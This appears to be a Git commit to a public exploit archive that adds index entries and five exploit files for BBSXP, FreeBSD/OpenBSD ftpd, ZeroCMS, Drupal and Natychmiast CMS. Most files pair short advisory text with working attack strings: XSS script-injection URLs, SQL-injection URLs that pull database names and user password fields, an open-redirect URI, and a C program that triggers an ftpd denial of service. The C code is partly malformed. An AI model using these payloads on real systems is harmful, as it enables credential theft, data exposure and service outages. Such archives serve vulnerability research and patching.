Updated 06_12_2014
This commit is contained in:
Offensive Security
parent
9317b28542
commit
5386cedc8f
6 changed files with 137 additions and 0 deletions
|
|
@ -30357,3 +30357,8 @@ id,file,description,date,author,platform,type,port
|
|||
33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80
|
||||
33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
|
||||
33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
|
||||
33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
|
||||
33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0
|
||||
33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
|
||||
33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0
|
||||
33709,platforms/php/webapps/33709.txt,"Natychmiast CMS Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-03-05,"Maciej Gojny",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
24
platforms/asp/webapps/33704.txt
Executable file
24
platforms/asp/webapps/33704.txt
Executable file
|
|
@ -0,0 +1,24 @@
|
|||
source: http://www.securityfocus.com/bid/38542/info
|
||||
|
||||
BBSXP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
BBSXP 2008 is vulnerable; other versions may also be affected.
|
||||
|
||||
Home Page : http://www.bbsxp.com/
|
||||
|
||||
|
||||
i found a xss on "ThreadID" parameter in "ShowPost.asp" in BBSXP 2008 , it's "ShowPost.asp?ThreadID="
|
||||
|
||||
for example:
|
||||
http://www.example.com/ShowPost.asp?ThreadID=1"><script>alert(/Liscker/);</script>
|
||||
|
||||
We shouldnt encode the script, or, the xss will fail.
|
||||
|
||||
|
||||
|
||||
|
||||
Liscker
|
||||
|
||||
2010.3.4
|
||||
47
platforms/bsd/dos/33708.c
Executable file
47
platforms/bsd/dos/33708.c
Executable file
|
|
@ -0,0 +1,47 @@
|
|||
source: http://www.securityfocus.com/bid/38559/info
|
||||
|
||||
The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference.
|
||||
|
||||
Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
|
||||
|
||||
This issue affects the following releases:
|
||||
|
||||
FreeBSD 8.0, 6.3, 4.9
|
||||
OpenBSD 4.5 and 4.6
|
||||
|
||||
#include <glob.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define MAXUSRARGS 100
|
||||
#define MAXGLOBARGS 1000
|
||||
|
||||
void do_glob() {
|
||||
glob_t gl;
|
||||
char **pop;
|
||||
|
||||
char buffer[256];
|
||||
strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");
|
||||
|
||||
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
|
||||
memset(&gl, 0, sizeof(gl));
|
||||
gl.gl_matchc = MAXGLOBARGS;
|
||||
flags |= GLOB_LIMIT;
|
||||
if (glob(buffer, flags, NULL, &gl)) {
|
||||
printf("GLOB FAILED!\n");
|
||||
return 0;
|
||||
}
|
||||
else
|
||||
// for (pop = gl.gl_pathv; pop && *pop && 1 <
|
||||
(MAXGLOBARGS-1);
|
||||
for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
|
||||
pop++) {
|
||||
printf("glob success");
|
||||
return 0;
|
||||
}
|
||||
globfree(&gl);
|
||||
}
|
||||
|
||||
main(int argc, char **argv) {
|
||||
do_glob();
|
||||
do_glob();
|
||||
}
|
||||
36
platforms/php/webapps/33702.txt
Executable file
36
platforms/php/webapps/33702.txt
Executable file
|
|
@ -0,0 +1,36 @@
|
|||
?
|
||||
ZeroCMS 1.0 (article_id) SQL Injection Vulnerability
|
||||
|
||||
|
||||
Vendor: Another Awesome Stuff
|
||||
Product web page: http://www.aas9.in/zerocms/
|
||||
Affected version: 1.0
|
||||
|
||||
Summary: ZeroCMS is a very simple Content Management
|
||||
System built using PHP and MySQL.
|
||||
|
||||
Desc: Input passed via the 'article_id' GET parameter
|
||||
to zero_view_article.php script is not properly sanitised
|
||||
before being used in SQL queries. This can be exploited
|
||||
to manipulate SQL queries by injecting arbitrary SQL code.
|
||||
|
||||
Tested on: Apache/2.4.7 (Win32)
|
||||
PHP/5.5.6
|
||||
MySQL 5.6.14
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2014-5186
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5186.php
|
||||
|
||||
|
||||
09.06.2014
|
||||
|
||||
--
|
||||
|
||||
|
||||
http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+concat(unhex(hex(cast(database()+as+char)))),2,3,4,5,6--
|
||||
http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+(select+concat(unhex(hex(cast(zero_users.name+as+char))),0x20,0x7c,0x20,unhex(hex(cast(zero_users.password+as+char))))+from+`zcdb`.zero_users+limit 0,1),2,3,4,5,6--
|
||||
15
platforms/php/webapps/33706.txt
Executable file
15
platforms/php/webapps/33706.txt
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/38545/info
|
||||
|
||||
Drupal is prone to multiple vulnerabilities, including cross-site scripting issues, a phishing issue, and a security-bypass issue.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, bypass security restrictions, or perform other attacks.
|
||||
|
||||
These issues affect the following:
|
||||
|
||||
Drupal 5.x prior to 5.22
|
||||
Drupal 6.x prior to 6.16
|
||||
|
||||
The following example URI is available for the redirect issue:
|
||||
|
||||
http://www.example.com/drupal-6.16/index.php?q=http://www.example.net
|
||||
|
||||
10
platforms/php/webapps/33709.txt
Executable file
10
platforms/php/webapps/33709.txt
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/38561/info
|
||||
|
||||
Natychmiast CMS is prone to multiple cross-site scripting and SQL-injection vulnerabilities.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?id_str=[SQLi]
|
||||
http://www.example.com/a_index.php?id_str=[SQLi]
|
||||
http://www.example.com/index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
|
||||
http://www.example.com/a_index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
|
||||
Loading…
Add table
Reference in a new issue